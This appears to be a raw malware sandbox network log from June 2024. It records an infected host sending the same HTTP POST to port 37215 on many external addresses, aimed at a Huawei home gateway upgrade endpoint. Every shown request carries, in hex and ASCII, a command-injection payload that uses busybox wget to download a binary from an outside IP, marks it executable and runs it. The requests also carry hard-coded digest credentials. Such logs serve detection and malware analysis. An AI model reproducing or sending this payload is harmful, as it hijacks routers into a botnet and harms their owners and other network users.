68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            697192.168.2.153867441.17.108.23237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161360025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            698192.168.2.153416041.174.79.23537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161365986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            699192.168.2.153734641.181.49.16237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161412001 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            700192.168.2.155269241.164.25.5537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161412954 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            701192.168.2.155620241.238.241.9337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161413908 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            702192.168.2.153311641.119.192.18537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161457062 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            703192.168.2.153716041.90.215.9137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161457062 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            704192.168.2.155512441.179.126.12337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161458969 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            705192.168.2.154942441.180.245.12437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161556005 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            706192.168.2.155261641.51.54.3337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161564112 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            707192.168.2.155092841.195.150.19637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161566019 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
